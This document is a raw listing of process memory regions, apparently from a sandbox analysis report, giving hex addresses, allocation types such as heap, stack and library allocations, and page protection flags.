trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
A98000
heap
page read and write
9660000
trusted library allocation
page read and write
207EA532000
heap
page read and write
2616008C000
heap
page read and write
97B0000
unkown
page read and write
9710000
trusted library allocation
page read and write
5330000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
97F9000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
6B00000
heap
page read and write
47B1000
trusted library allocation
page read and write
8767000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
B290000
trusted library allocation
page read and write
95D0000
unkown
page read and write
8760000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
96E5000
trusted library allocation
page read and write
7B30000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
5250000
heap
page read and write
8706000
trusted library allocation
page read and write
A4A0000
trusted library allocation
page read and write
2DB0000
trusted library allocation
page read and write
26166000000
heap
page read and write
8A9000
heap
page read and write
96E0000
trusted library allocation
page read and write
9A30000
trusted library allocation
page read and write
C455000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
290C404D000
heap
page read and write
9680000
trusted library allocation
page read and write
A4F7000
trusted library allocation
page read and write
5F98000
trusted library allocation
page read and write
A500000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
927F9FF000
stack
page read and write
9620000
trusted library allocation
page read and write
96F8000
trusted library allocation
page read and write
B2E0000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
8730000
trusted library allocation
page read and write
A3F0000
trusted library allocation
page read and write
9696000
trusted library allocation
page read and write
9665000
trusted library allocation
page read and write
760000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
47CC000
trusted library allocation
page read and write
5510000
trusted library allocation
page read and write
A470000
trusted library allocation
page read and write
26160902000
heap
page read and write
9620000
trusted library allocation
page read and write
1CB89A3D000
heap
page read and write
94A0000
trusted library allocation
page read and write
B290000
trusted library allocation
page read and write
8740000
unkown
page read and write
5390000
trusted library allocation
page read and write
2853505D000
heap
page read and write
9420000
trusted library allocation
page read and write
7E881FE000
stack
page read and write
3180000
trusted library section
page read and write
A510000
trusted library allocation
page read and write
9943000
unkown
page read and write
A9E000
stack
page read and write
A4D0000
trusted library allocation
page read and write
8750000
trusted library allocation
page read and write
1CB89A57000
heap
page read and write
9660000
trusted library allocation
page read and write
A3F0000
trusted library allocation
page read and write
5F9000
stack
page read and write
9610000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
B2B0000
trusted library allocation
page read and write
77B0000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
7E8799E000
stack
page read and write
9490000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
A510000
trusted library allocation
page read and write
7A94000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
2DD0000
trusted library allocation
page read and write
99B0000
trusted library allocation
page execute and read and write
A4E000
heap
page read and write
A410000
trusted library allocation
page read and write
26160013000
heap
page read and write
7A4E000
stack
page read and write
9620000
trusted library allocation
page read and write
A4A0000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
9BDE000
unkown
page read and write
8730000
trusted library allocation
page read and write
3198000
heap
page read and write
5519000
trusted library allocation
page read and write
B3C000
stack
page read and write
96C0000
unkown
page read and write
9665000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
C515000
trusted library allocation
page read and write
B44B000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
A90000
heap
page read and write
700000
heap
page read and write
9660000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
A4E0000
trusted library allocation
page read and write
5500000
trusted library allocation
page read and write
C4D7000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
A500000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
5500000
trusted library allocation
page read and write
87F000
heap
page read and write
9720000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
4760000
heap
page read and write
A4F0000
trusted library allocation
page read and write
8730000
trusted library allocation
page read and write
18287213000
heap
page read and write
94B0000
trusted library allocation
page read and write
207E9970000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
28A08850000
heap
page read and write
6035000
trusted library allocation
page read and write
A490000
trusted library allocation
page read and write
2DD0000
trusted library allocation
page read and write
85F0000
direct allocation
page read and write
A470000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
9920000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
9A30000
trusted library allocation
page read and write
95F5000
trusted library allocation
page read and write
989D000
trusted library allocation
page read and write
E26317B000
stack
page read and write
9720000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
21F7E502000
heap
page read and write
A510000
trusted library allocation
page read and write
97B0000
unkown
page read and write
20148E28000
heap
page read and write
28A08A65000
heap
page read and write
A3F0000
trusted library allocation
page read and write
9480000
unkown
page read and write
21F7E429000
heap
page read and write
6015000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
1CB89A44000
heap
page read and write
97C0000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
9A66000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
70E1000
direct allocation
page read and write
7AC0000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
7FA000
stack
page read and write
7B90000
trusted library allocation
page read and write
7AC0000
trusted library allocation
page read and write
28A088B0000
heap
page read and write
C085000
trusted library allocation
page read and write
B2F0000
trusted library allocation
page read and write
2853505A000
heap
page read and write
7BA0000
trusted library allocation
page read and write
5330000
trusted library allocation
page read and write
85B0000
direct allocation
page read and write
B290000
trusted library allocation
page read and write
59D000
stack
page read and write
290C3FA0000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
51D1000
direct allocation
page read and write
9660000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
150000
trusted library allocation
page read and write
95D0000
unkown
page read and write
207E9A13000
heap
page read and write
9660000
trusted library allocation
page read and write
AF8387E000
stack
page read and write
7610000
trusted library allocation
page read and write
86F5000
unkown
page read and write
261614C3000
trusted library allocation
page read and write
A430000
trusted library allocation
page execute and read and write
9410000
trusted library allocation
page read and write
30CC000
heap
page read and write
96D0000
trusted library allocation
page read and write
7AB0000
trusted library allocation
page read and write
26165690000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
20148F02000
heap
page read and write
5520000
trusted library allocation
page read and write
6397FE000
stack
page read and write
9A80000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
4796000
trusted library allocation
page read and write
A7E000
stack
page read and write
A4F0000
trusted library allocation
page read and write
880000
heap
page read and write
7AC0000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
7B40000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
52BA000
heap
page read and write
1EE92602000
trusted library allocation
page read and write
9420000
trusted library allocation
page read and write
5FF7000
trusted library allocation
page read and write
B330000
trusted library allocation
page read and write
7E880FD000
stack
page read and write
96F0000
trusted library allocation
page read and write
A499000
trusted library allocation
page read and write
9430000
trusted library allocation
page read and write
5CD1000
trusted library allocation
page read and write
1CB89A45000
heap
page read and write
7630000
trusted library allocation
page read and write
1CB89A29000
heap
page read and write
927F8FE000
stack
page read and write
A450000
trusted library allocation
page read and write
7BB0000
trusted library allocation
page read and write
AA6000
heap
page read and write
9670000
trusted library allocation
page read and write
18287308000
heap
page read and write
261657D0000
remote allocation
page read and write
52F1000
heap
page read and write
86F0000
trusted library allocation
page read and write
96C0000
unkown
page read and write
A4A0000
trusted library allocation
page read and write
9710000
unkown
page read and write
C3DA000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
600D000
trusted library allocation
page read and write
8750000
unkown
page read and write
9610000
trusted library allocation
page read and write
ABE000
heap
page read and write
70C0000
direct allocation
page read and write
97C0000
trusted library allocation
page read and write
261654D0000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
9490000
unkown
page read and write
7630000
trusted library allocation
page execute and read and write
9610000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
8750000
trusted library allocation
page read and write
86F5000
trusted library allocation
page read and write
6AA0000
direct allocation
page read and write
A410000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
8705000
trusted library allocation
page read and write
551D000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
7AE0000
trusted library allocation
page read and write
A4C0000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
96A0000
trusted library allocation
page read and write
B2B0000
trusted library allocation
page read and write
7B90000
unkown
page read and write
9480000
trusted library allocation
page read and write
5503000
trusted library allocation
page read and write
99A0000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
2DD0000
trusted library allocation
page read and write
69D4000
direct allocation
page read and write
7B90000
unkown
page read and write
7B90000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
207E9A29000
heap
page read and write
A510000
trusted library allocation
page read and write
964677E000
stack
page read and write
B280000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
9480000
unkown
page read and write
9495000
trusted library allocation
page read and write
2853502C000
heap
page read and write
83D7D7F000
stack
page read and write
A3F0000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
28535000000
heap
page read and write
9740000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
9970000
unkown
page read and write
9660000
trusted library allocation
page read and write
7870000
trusted library allocation
page read and write
8760000
unkown
page read and write
9590000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
9486000
unkown
page read and write
52C2000
heap
page read and write
96A0000
trusted library allocation
page read and write
94B5000
unkown
page read and write
9610000
trusted library allocation
page read and write
2E60000
trusted library allocation
page read and write
C435000
trusted library allocation
page read and write
AC8000
heap
page read and write
9620000
trusted library allocation
page read and write
86F0000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
2DB0000
trusted library allocation
page read and write
8740000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
C5E0000
trusted library allocation
page read and write
52AC000
heap
page read and write
A4D0000
trusted library allocation
page read and write
A640000
trusted library allocation
page read and write
69DF000
direct allocation
page read and write
207EA500000
heap
page read and write
A466000
trusted library allocation
page read and write
18287090000
heap
page read and write
261600A0000
heap
page read and write
A3F0000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
817000
heap
page read and write
50C7000
trusted library allocation
page execute and read and write
5500000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
1DDDC202000
heap
page read and write
9520000
unkown
page read and write
3190000
heap
page read and write
A410000
trusted library allocation
page read and write
83D7BFF000
stack
page read and write
26165860000
heap
page read and write
2687AA53000
heap
page read and write
85E8000
direct allocation
page read and write
5250000
heap
page read and write
9710000
trusted library allocation
page read and write
A4B0000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
77A0000
trusted library allocation
page read and write
99A0000
trusted library allocation
page read and write
9A30000
trusted library allocation
page execute and read and write
96F0000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
2DC0000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
86F5000
trusted library allocation
page read and write
8760000
unkown
page read and write
8705000
trusted library allocation
page read and write
883000
heap
page read and write
A510000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
A440000
trusted library allocation
page read and write
50E0000
trusted library allocation
page read and write
5316000
heap
page read and write
9A10000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
A510000
trusted library allocation
page read and write
5550000
trusted library allocation
page execute and read and write
893000
heap
page read and write
AD0000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
4848000
trusted library allocation
page read and write
54D0000
trusted library allocation
page read and write
888000
heap
page read and write
97E9000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
9A60000
unkown
page read and write
97E0000
unkown
page read and write
96C0000
trusted library allocation
page execute and read and write
6591000
trusted library allocation
page read and write
9A30000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
537D000
stack
page read and write
96DF000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
5BAC000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
52A0000
trusted library allocation
page read and write
E2632F7000
stack
page read and write
2616580E000
heap
page read and write
9470000
trusted library allocation
page read and write
A4B0000
trusted library allocation
page read and write
290C403D000
heap
page read and write
9620000
unkown
page read and write
9A40000
trusted library allocation
page execute and read and write
99A0000
trusted library allocation
page read and write
62BF000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
A640000
trusted library allocation
page read and write
ABE000
heap
page read and write
96C0000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
986947F000
stack
page read and write
96D0000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
A3F0000
trusted library allocation
page read and write
E8986FF000
stack
page read and write
7B00000
trusted library allocation
page read and write
83D79FF000
stack
page read and write
98E000
stack
page read and write
96D0000
trusted library allocation
page read and write
9530000
trusted library allocation
page read and write
A500000
trusted library allocation
page read and write
99A0000
trusted library allocation
page read and write
34F0000
heap
page read and write
5308000
heap
page read and write
A4C0000
trusted library allocation
page read and write
9895000
trusted library allocation
page read and write
9868F7D000
stack
page read and write
B330000
trusted library allocation
page read and write
9510000
trusted library allocation
page read and write
A4F0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
207E9A40000
heap
page read and write
97C2000
trusted library allocation
page read and write
7B20000
trusted library allocation
page read and write
5093000
trusted library allocation
page execute and read and write
28A08A66000
heap
page read and write
A3F0000
trusted library allocation
page read and write
290C5AB0000
trusted library allocation
page read and write
977E000
stack
page read and write
A440000
trusted library allocation
page read and write
77A0000
trusted library allocation
page read and write
290C4129000
heap
page read and write
261657D0000
remote allocation
page read and write
78D0000
heap
page read and write
8B1000
heap
page read and write
9A20000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
A4F0000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
A440000
trusted library allocation
page read and write
2DC0000
trusted library allocation
page read and write
5ECD000
trusted library allocation
page read and write
7790000
trusted library allocation
page read and write
9550000
trusted library allocation
page read and write
A4F0000
trusted library allocation
page read and write
77B0000
trusted library allocation
page read and write
290C408E000
heap
page read and write
A4D0000
trusted library allocation
page read and write
964627F000
stack
page read and write
78D1000
heap
page read and write
97C0000
unkown
page read and write
9720000
trusted library allocation
page read and write
75C0000
trusted library allocation
page read and write
62CA000
trusted library allocation
page read and write
927F47B000
stack
page read and write
1CB89A42000
heap
page read and write
A490000
trusted library allocation
page read and write
20148D30000
heap
page read and write
A4D8000
trusted library allocation
page read and write
28535062000
heap
page read and write
1CB89A32000
heap
page read and write
BEB1000
trusted library allocation
page read and write
99A0000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
948D000
unkown
page read and write
AB4000
heap
page read and write
9620000
trusted library allocation
page read and write
5080000
trusted library allocation
page read and write
85F2000
trusted library allocation
page read and write
B07E000
stack
page read and write
A640000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
83A000
heap
page read and write
A510000
trusted library allocation
page read and write
9A30000
trusted library allocation
page read and write
8740000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
94B0000
trusted library allocation
page read and write
1CB89A78000
heap
page read and write
98D0000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
530D000
heap
page read and write
9496000
trusted library allocation
page read and write
BD332FD000
stack
page read and write
A4E0000
trusted library allocation
page read and write
B2A0000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
8BF000
heap
page read and write
5320000
heap
page read and write
95F0000
trusted library allocation
page read and write
97D7000
trusted library allocation
page read and write
5F69000
trusted library allocation
page read and write
C3C0000
trusted library allocation
page read and write
86F7000
trusted library allocation
page read and write
7AD0000
trusted library allocation
page execute and read and write
54A0000
trusted library allocation
page read and write
6A84000
direct allocation
page read and write
7100000
direct allocation
page read and write
9480000
trusted library allocation
page read and write
3151000
trusted library allocation
page read and write
28A08A29000
heap
page read and write
C585000
trusted library allocation
page read and write
300000
heap
page read and write
2687A830000
heap
page read and write
9480000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
A4B0000
trusted library allocation
page read and write
2615FED0000
heap
page read and write
9660000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
4795000
trusted library allocation
page read and write
75B0000
trusted library allocation
page read and write
5F60000
trusted library allocation
page read and write
9920000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
C3D0000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
A494000
trusted library allocation
page read and write
9490000
unkown
page read and write
98E0000
trusted library allocation
page read and write
2DC0000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
9525000
unkown
page read and write
3150000
trusted library allocation
page read and write
5520000
trusted library allocation
page read and write
9420000
trusted library allocation
page read and write
A3F0000
trusted library allocation
page read and write
7750000
trusted library allocation
page read and write
9A30000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
A4B000
heap
page read and write
A61000
heap
page read and write
1DDDC0D0000
heap
page read and write
1DDDCC02000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
849000
heap
page read and write
8735000
unkown
page read and write
9490000
trusted library allocation
page read and write
866D000
trusted library allocation
page read and write
86F0000
trusted library allocation
page read and write
5FE6000
trusted library allocation
page read and write
9479000
trusted library allocation
page read and write
A500000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
EE434FB000
stack
page read and write
A4A0000
trusted library allocation
page read and write
5298000
heap
page read and write
A500000
trusted library allocation
page read and write
A3F0000
trusted library allocation
page read and write
9640000
unkown
page read and write
4770000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
B290000
trusted library allocation
page read and write
4580000
heap
page read and write
5460000
trusted library allocation
page read and write
9665000
trusted library allocation
page read and write
26165790000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
59AA000
trusted library allocation
page read and write
C030000
trusted library allocation
page read and write
63FE000
stack
page read and write
96D0000
trusted library allocation
page read and write
2DA0000
trusted library section
page read and write
9480000
trusted library allocation
page read and write
50CB000
trusted library allocation
page execute and read and write
97F0000
unkown
page read and write
6A91000
direct allocation
page read and write
96F0000
trusted library allocation
page read and write
B380000
trusted library allocation
page read and write
261607E1000
trusted library allocation
page read and write
6A00000
direct allocation
page read and write
8A7000
heap
page read and write
28A089B0000
trusted library allocation
page read and write
21F7E350000
remote allocation
page read and write
C51D000
trusted library allocation
page read and write
9622000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
99A0000
trusted library allocation
page read and write
86F0000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
99C0000
trusted library allocation
page read and write
5B8F000
trusted library allocation
page read and write
A3F0000
trusted library allocation
page read and write
8FC000
stack
page read and write
95F0000
trusted library allocation
page read and write
927F4FE000
stack
page read and write
96F5000
unkown
page read and write
290C402A000
heap
page read and write
9660000
trusted library allocation
page read and write
75A0000
trusted library allocation
page read and write
C496000
trusted library allocation
page read and write
4550000
heap
page read and write
5480000
trusted library allocation
page read and write
1828725E000
heap
page read and write
A400000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
A470000
trusted library allocation
page read and write
94E000
stack
page read and write
98686EC000
stack
page read and write
97F0000
trusted library allocation
page read and write
E897F0C000
stack
page read and write
96D7000
trusted library allocation
page read and write
20148E02000
heap
page read and write
A520000
trusted library allocation
page execute and read and write
9660000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
A510000
trusted library allocation
page read and write
1EE91C29000
heap
page read and write
B290000
trusted library allocation
page read and write
9665000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
9720000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
9480000
unkown
page read and write
8700000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
9485000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
2687AB02000
heap
page read and write
A4D0000
trusted library allocation
page read and write
861000
heap
page read and write
52B0000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
A500000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
9486000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
B300000
trusted library allocation
page read and write
B290000
trusted library allocation
page read and write
261657C0000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
2DB0000
trusted library allocation
page read and write
9550000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9728000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
9480000
unkown
page read and write
BD3357D000
stack
page read and write
B480000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
C4CE000
trusted library allocation
page read and write
896000
heap
page read and write
9970000
unkown
page read and write
96F0000
trusted library allocation
page read and write
A4F0000
trusted library allocation
page read and write
5120000
heap
page read and write
2EBE000
heap
page read and write
9740000
trusted library allocation
page read and write
5380000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
9495000
unkown
page read and write
9610000
trusted library allocation
page read and write
851000
heap
page read and write
9520000
trusted library allocation
page read and write
986C000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
6980000
direct allocation
page read and write
9620000
trusted library allocation
page read and write
26161170000
trusted library section
page readonly
3130000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
2DC0000
trusted library allocation
page read and write
8730000
trusted library allocation
page read and write
77B0000
trusted library allocation
page read and write
85C4000
trusted library allocation
page read and write
207E9A00000
heap
page read and write
28534DD0000
heap
page read and write
C052000
trusted library allocation
page read and write
21F7EC02000
trusted library allocation
page read and write
EE438F9000
stack
page read and write
21F7E320000
trusted library allocation
page read and write
94B5000
trusted library allocation
page read and write
A510000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
9975000
unkown
page read and write
9940000
trusted library allocation
page read and write
9487000
unkown
page read and write
9720000
trusted library allocation
page read and write
838E000
stack
page read and write
3110000
heap
page read and write
B290000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
83D7AFF000
stack
page read and write
9490000
unkown
page read and write
A4F0000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
EE433FE000
stack
page read and write
1EE91C13000
heap
page read and write
A460000
trusted library allocation
page read and write
20148E58000
heap
page read and write
7AC0000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
50A3000
trusted library allocation
page read and write
9720000
trusted library allocation
page read and write
9480000
unkown
page read and write
5490000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
1CB8A202000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
9950000
unkown
page read and write
85E2000
direct allocation
page read and write
5510000
trusted library allocation
page read and write
9A70000
trusted library allocation
page read and write
A4F0000
trusted library allocation
page read and write
97F0000
unkown
page read and write
95F0000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
52BE000
heap
page read and write
9660000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
E8987FE000
stack
page read and write
7B00000
trusted library allocation
page read and write
C5E4000
trusted library allocation
page read and write
76A4000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
C44D000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
9400000
trusted library allocation
page execute and read and write
96D0000
trusted library allocation
page read and write
9478000
trusted library allocation
page read and write
B290000
trusted library allocation
page read and write
A440000
trusted library allocation
page read and write
796000
heap
page read and write
83D7EFE000
stack
page read and write
E897F8E000
stack
page read and write
9840000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
625E000
stack
page read and write
77A0000
trusted library allocation
page read and write
2DC0000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
99C5000
trusted library allocation
page read and write
AB2000
heap
page read and write
9800000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
9480000
unkown
page read and write
7AC0000
trusted library allocation
page read and write
8720000
trusted library allocation
page read and write
9640000
unkown
page read and write
EE435FE000
stack
page read and write
A490000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
454F000
stack
page read and write
54FC000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
7E87EF7000
stack
page read and write
866000
heap
page read and write
9540000
trusted library allocation
page read and write
261657B0000
trusted library allocation
page read and write
A4C0000
trusted library allocation
page read and write
1CB89860000
heap
page read and write
182871F0000
trusted library allocation
page read and write
7AF0000
trusted library allocation
page read and write
A470000
trusted library allocation
page read and write
B2B0000
trusted library allocation
page read and write
9485000
trusted library allocation
page read and write
8760000
trusted library allocation
page read and write
5180000
direct allocation
page read and write
B350000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
8700000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
97C0000
unkown
page read and write
A4D0000
trusted library allocation
page read and write
5FAF000
trusted library allocation
page read and write
B310000
trusted library allocation
page read and write
B72F67B000
stack
page read and write
C526000
trusted library allocation
page read and write
870C000
trusted library allocation
page read and write
A4F0000
trusted library allocation
page read and write
3077000
heap
page read and write
9620000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
140000
heap
page read and write
A3F0000
trusted library allocation
page read and write
2687A820000
heap
page read and write
9610000
trusted library allocation
page read and write
7DE000
stack
page read and write
69C0000
direct allocation
page read and write
28535113000
heap
page read and write
886000
heap
page read and write
65F3000
trusted library allocation
page read and write
2DC0000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
603D000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
290C5A70000
trusted library allocation
page read and write
471C000
stack
page read and write
3150000
trusted library allocation
page read and write
A4B0000
trusted library allocation
page read and write
3130000
trusted library allocation
page read and write
7750000
trusted library allocation
page read and write
8730000
trusted library allocation
page read and write
96B0000
unkown
page read and write
889000
heap
page read and write
33E7000
stack
page read and write
7A90000
trusted library allocation
page read and write
28A08A26000
heap
page read and write
B400000
trusted library allocation
page read and write
A681000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
851000
heap
page read and write
8760000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
5460000
trusted library allocation
page read and write
7B10000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
2DB0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
336E000
stack
page read and write
96E0000
trusted library allocation
page read and write
87C000
heap
page read and write
2DC0000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
C3C8000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
9970000
unkown
page read and write
A461000
trusted library allocation
page read and write
1EE91C46000
heap
page read and write
9730000
trusted library allocation
page read and write
A517000
trusted library allocation
page read and write
5520000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
26161150000
trusted library section
page readonly
9980000
trusted library allocation
page read and write
9690000
trusted library allocation
page read and write
7AC0000
trusted library allocation
page read and write
310000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9A30000
trusted library allocation
page read and write
1CB89A6E000
heap
page read and write
BD330FE000
stack
page read and write
95B5000
trusted library allocation
page read and write
B2B0000
trusted library allocation
page read and write
858000
heap
page read and write
290C405D000
heap
page read and write
8FC000
stack
page read and write
2687AA70000
heap
page read and write
9B9E000
unkown
page read and write
A450000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
5530000
trusted library allocation
page read and write
21F7E440000
heap
page read and write
65A2000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
97E5000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
69DF000
direct allocation
page read and write
96D0000
trusted library allocation
page read and write
1CB89A63000
heap
page read and write
46DC000
stack
page read and write
1E0000
remote allocation
page read and write
5F71000
trusted library allocation
page read and write
E2635FF000
stack
page read and write
A4D0000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
1EE91B80000
heap
page read and write
9600000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
54F0000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
5560000
trusted library allocation
page read and write
